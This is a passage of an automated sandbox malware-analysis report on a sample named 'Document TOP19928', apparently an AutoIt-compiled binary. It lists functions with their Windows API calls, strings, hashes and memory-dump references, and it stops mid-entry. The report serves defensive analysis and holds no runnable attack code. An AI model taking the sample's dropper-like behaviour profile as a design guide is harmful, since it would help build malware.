Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: 279fc5253c20ae8e204380bd1d1b86c8aa38836187858f5b153824aa88f1ede6
Instruction ID: 875b4565990cd548f64c005a0028531cb3329a8f1beb8f582766e4dd5e6ac6dd
Opcode Fuzzy Hash: 279fc5253c20ae8e204380bd1d1b86c8aa38836187858f5b153824aa88f1ede6
Instruction Fuzzy Hash: A93169B1805349AFDB00EFA4DC88AD9BFF0FB09311F18456AE690E62A1E3B90555CF51

Function 007D3041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 007D3074
RegisterClassExW.USER32(00000030), ref: 007D309E
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007D30AF
LoadIconW.USER32(000000A9), ref: 007D30F2

Strings

+, xrefs: 007D305D
0, xrefs: 007D3056
AutoIt v3 GUI, xrefs: 007D3090
TaskbarCreated, xrefs: 007D30A4

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: a2abde4e25201482c6ef0949ed98ab07342a38f66e0a6e87dcb68a97955992e0
Instruction ID: b3a2c645075c582de8bc85427256da6cb92c568e2c290f17527f8c0684cbb242
Opcode Fuzzy Hash: a2abde4e25201482c6ef0949ed98ab07342a38f66e0a6e87dcb68a97955992e0
Instruction Fuzzy Hash: 5B21C3B1911318AFDB00EFA4E889BDEBBF4FB08711F04412AFA11A62A1E7B54554CF91

Function 00EE0920 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00EE0965

Memory Dump Source

Source File: 00000000.00000002.2013615732.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_Document TOP19928.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: aa68364797623241a338bf120d6f7b29802cc3778168724d268d7475a42fc968
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: DA51E775A5024CFBEB20DFA5CC49FDE7778AF48704F108558F60AFA180DAB49A849B60

Function 007D39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007D3A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007D3A36
ShowWindow.USER32(00000000,?,?), ref: 007D3A4A
ShowWindow.USER32(00000000,?,?), ref: 007D3A53

Strings

edit, xrefs: 007D3A30
AutoIt v3, xrefs: 007D3A0D, 007D3A12, 007D3A13

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: e95ae8a52c66641a6aa3602f74880477043cd18b22bb77fed465d44cb64e9ed8
Instruction ID: 1859081076097a5c66c02cf55e2a5e65fda940c1b11720fe616b9807d97eb3bd
Opcode Fuzzy Hash: e95ae8a52c66641a6aa3602f74880477043cd18b22bb77fed465d44cb64e9ed8
Instruction Fuzzy Hash: BAF03A706002907EEA3127A36C08E273E7DF7CAF61F04002ABA00A21B1D2A91820CAB0

Function 007DF8CF Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007F03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007F03D3
Part of subcall function 007F03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 007F03DB
Part of subcall function 007F03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007F03E6
Part of subcall function 007F03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007F03F1
Part of subcall function 007F03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 007F03F9
Part of subcall function 007F03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 007F0401

Part of subcall function 007E6259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 007E62B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007DFB2D
OleInitialize.OLE32(00000000), ref: 007DFBAA
CloseHandle.KERNEL32(00000000), ref: 008149F2

Strings

(, xrefs: 007DF957
X, xrefs: 007DF9AC

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
String ID: ($X
API String ID: 3094916012-1379156393
Opcode ID: 7ff597cda8d32f5f60fbed75b535934bf81fafdddfe0034df6cca18f9fcf5aea
Instruction ID: 869f21e87a0c4f73796be8df24d61c99e9e98ca2e060558d5c2cc24a93494180
Opcode Fuzzy Hash: 7ff597cda8d32f5f60fbed75b535934bf81fafdddfe0034df6cca18f9fcf5aea
Instruction Fuzzy Hash: 2B81C8B0905240DEC784FFBAE9596157BE4FB9831871C822BD219C7362FB394428CF99

Function 007D410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0080D5EC

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

_memset.LIBCMT ref: 007D418D
_wcscpy.LIBCMT ref: 007D41E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007D41F1

Strings

Line: , xrefs: 0080D615

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: ab7f549f2f38e1181aa38899899682278a64ee5a878c0fee75da3e60b9141ce5
Instruction ID: 3d4d965461c528e71a5026fbe19295b74741d4ab0c037d23a33da858d69b6492
Opcode Fuzzy Hash: ab7f549f2f38e1181aa38899899682278a64ee5a878c0fee75da3e60b9141ce5
Instruction Fuzzy Hash: 41319E71008308ABD725EBA0DC4ABDA77F8BF44300F14461BB595922A1FB78AA58C796

Function 007F564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 007F56AB
_memcpy_s.LIBCMT ref: 007F571D
__read_nolock.LIBCMT ref: 007F577B
__filbuf.LIBCMT ref: 007F579E
_memset.LIBCMT ref: 007F57E2

Part of subcall function 007F8D68: __getptd_noexit.LIBCMT ref: 007F8D68

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: b219aa6a1aa1462842ab94720c8373a32bc318a8684d5f63a7bc17543413be94
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: 0151BE30A00B0DDBDB24AFA9C88467E77A1AF40720F248729FB35D63D0DB789D508B61

Function 007D69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 007D4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4F6F

_free.LIBCMT ref: 0080E68C
_free.LIBCMT ref: 0080E6D3

Part of subcall function 007D6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007D6D0D

Strings

Bad directive syntax error, xrefs: 0080E6BB
>>>AUTOIT SCRIPT<<<, xrefs: 0080E462

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: e33cde68ccf0efd65a8904208177ac1d882b79160c1fd4b6ba7cbc9b8f7a2f63
Instruction ID: 0220329d729193b713220b839f86bf86734d981a5c5fe7f77b0238cca1ffdc43
Opcode Fuzzy Hash: e33cde68ccf0efd65a8904208177ac1d882b79160c1fd4b6ba7cbc9b8f7a2f63
Instruction Fuzzy Hash: 36918C71910619EFCF14EFA8CC959EEB7B4FF14314F14482AE811EB2A1EB34A904CB50

Function 00EE23B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE22A0: Sleep.KERNELBASE(000001F4), ref: 00EE22B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EE24E9

Strings

410U3UAXV10DEZRDXCZS53, xrefs: 00EE2569, 00EE256C

Memory Dump Source

Source File: 00000000.00000002.2013615732.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_Document TOP19928.jbxd

Similarity

API ID: CreateFileSleep
String ID: 410U3UAXV10DEZRDXCZS53
API String ID: 2694422964-2367928150
Opcode ID: c6a61159c97162c982fefcc0f79677eaf705ed0e791da611afef38fa10963222
Instruction ID: fd2147b3a5407c6082ca407b354c9c71a08f5135f6791b378d53fcd66161f94e
Opcode Fuzzy Hash: c6a61159c97162c982fefcc0f79677eaf705ed0e791da611afef38fa10963222
Instruction Fuzzy Hash: 5D619530D0428CDAEF11DBA4C8557EFBB79AF19304F10419CE649BB2C1D6B91B49CBA6

Function 007D35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007D35A1,SwapMouseButtons,00000004,?), ref: 007D35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007D35A1,SwapMouseButtons,00000004,?,?,?,?,007D2754), ref: 007D35F5
RegCloseKey.KERNELBASE(00000000,?,?,007D35A1,SwapMouseButtons,00000004,?,?,?,?,007D2754), ref: 007D3617

Strings

Control Panel\Mouse, xrefs: 007D35D2

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 39c7c643c4bad3e3f44a811c2efd3ba1a47194f8a272170eab879b59d9d7ed8f
Instruction ID: 83b8e37d228e8c6ecc264d487ce41b7155355c5c4462a2f2482eeaa813947855
Opcode Fuzzy Hash: 39c7c643c4bad3e3f44a811c2efd3ba1a47194f8a272170eab879b59d9d7ed8f
Instruction Fuzzy Hash: 7F110375611218FADB208F64DC84EAABBB8EF04740F11856AB905D7210E6759E509BA2

Function 008397E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 007D5045: _fseek.LIBCMT ref: 007D505D

Part of subcall function 008399BE: _wcscmp.LIBCMT ref: 00839AAE
Part of subcall function 008399BE: _wcscmp.LIBCMT ref: 00839AC1

_free.LIBCMT ref: 0083992C
_free.LIBCMT ref: 00839933
_free.LIBCMT ref: 0083999E

Part of subcall function 007F2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,007F9C64), ref: 007F2FA9
Part of subcall function 007F2F95: GetLastError.KERNEL32(00000000,?,007F9C64), ref: 007F2FBB

_free.LIBCMT ref: 008399A6

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction ID: 5d42b4cd702b78e3c17bde3581b4027c5e736086d3e9bb4f6dba87daba3f5f57
Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction Fuzzy Hash: B3515CB1904218EFDF249F64CC85AAEBBB9FF48310F1004AEF649A7341DB755A808F59

Function 007F493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007F49D0
__flush.LIBCMT ref: 007F49F0
__write.LIBCMT ref: 007F4A23
__flsbuf.LIBCMT ref: 007F4A51

Part of subcall function 007F8D68: __getptd_noexit.LIBCMT ref: 007F8D68

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: 72f2eadcacc30f7f66cb9a325f5599c72dbede132baa2b82b884136aec130cc2
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: 7E41C57170060EEBDB28CE69C88497F77AAEF80360B24C13DEA55C7750DB78AD408B44

Function 007D73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0080EE62
7516D0D0.COMDLG32(?), ref: 0080EEAC

Part of subcall function 007D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D48A1,?,?,007D37C0,?), ref: 007D48CE

Part of subcall function 007F09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007F09F4

Strings

X, xrefs: 0080EE7A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: NamePath$7516FullLong_memset
String ID: X
API String ID: 3926756254-3081909835
Opcode ID: 69212f9c04f0fc4cf4c1302188ba97375d817e79149242f5771f3a067f7100de
Instruction ID: 7726074a7ccb5b5ad9ad55654b330b91acfc8ab692181b42dd53c44355ae81ae
Opcode Fuzzy Hash: 69212f9c04f0fc4cf4c1302188ba97375d817e79149242f5771f3a067f7100de
Instruction Fuzzy Hash: 7D21A471A0025C9BCB45DF94CC49BEE7BF9AF49310F04401AE508E7381EBB85949CF91

Function 0083901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00839036
__fread_nolock.LIBCMT ref: 0083904B

Strings

EA06, xrefs: 0083907D

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 9736582deb935c0d39d4eb3e4f9553d80f4ef5d9c2bbcc57155912d0bd6797a9
Instruction ID: ff5f69f48871adf73c88e217b88fc9bca05307e4ae1d75dae466da2ed68b1051
Opcode Fuzzy Hash: 9736582deb935c0d39d4eb3e4f9553d80f4ef5d9c2bbcc57155912d0bd6797a9
Instruction Fuzzy Hash: 4701BE7190465CAEDB28C6A8C85AEFE7BF8DB15311F00415AF652D2281D5B9A61487A0

Function 007F0FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007F594C: __FF_MSGBANNER.LIBCMT ref: 007F5963
Part of subcall function 007F594C: __NMSG_WRITE.LIBCMT ref: 007F596A
Part of subcall function 007F594C: RtlAllocateHeap.NTDLL(00EF0000,00000000,00000001), ref: 007F598F

std::exception::exception.LIBCMT ref: 007F102C
__CxxThrowException@8.LIBCMT ref: 007F1041

Part of subcall function 007F87DB: RaiseException.KERNEL32(?,?,00000000,0088BAF8,?,00000001,?,?,?,007F1046,00000000,0088BAF8,007D9FEC,00000001), ref: 007F8830

Strings

bad allocation, xrefs: 007F1021

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: bad allocation
API String ID: 3902256705-2104205924
Opcode ID: abced0869d97f67d029fe43df0c089bac87eeb50c87619e0056fc034c5d2d2ff
Instruction ID: 67d11885e1ce04957645a1ae5e9f001a71320f04fd8033c57cf1595756b22db6
Opcode Fuzzy Hash: abced0869d97f67d029fe43df0c089bac87eeb50c87619e0056fc034c5d2d2ff
Instruction Fuzzy Hash: E3F0A93550061DE6CB24BB94DC09AFF77A8EF00351F500455FB04D6752DFB99A9486E1

Function 00EE1000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00EE1045
ExitProcess.KERNEL32(00000000), ref: 00EE1064

Strings

D, xrefs: 00EE1011

Memory Dump Source

Source File: 00000000.00000002.2013615732.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_Document TOP19928.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
Instruction ID: 27e1c36605b8067dde62b9783e0cb4b0f8e87643fe0482e344bbf02d1daadf5c
Opcode Fuzzy Hash: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
Instruction Fuzzy Hash: CBF0EC7154028CABDB60DFE1CD49FEE777CBF04701F108508BB0AAA180DB7896488B61

Function 00839B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00839B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00839B99

Strings

aut, xrefs: 00839B93

Memory Dump Source

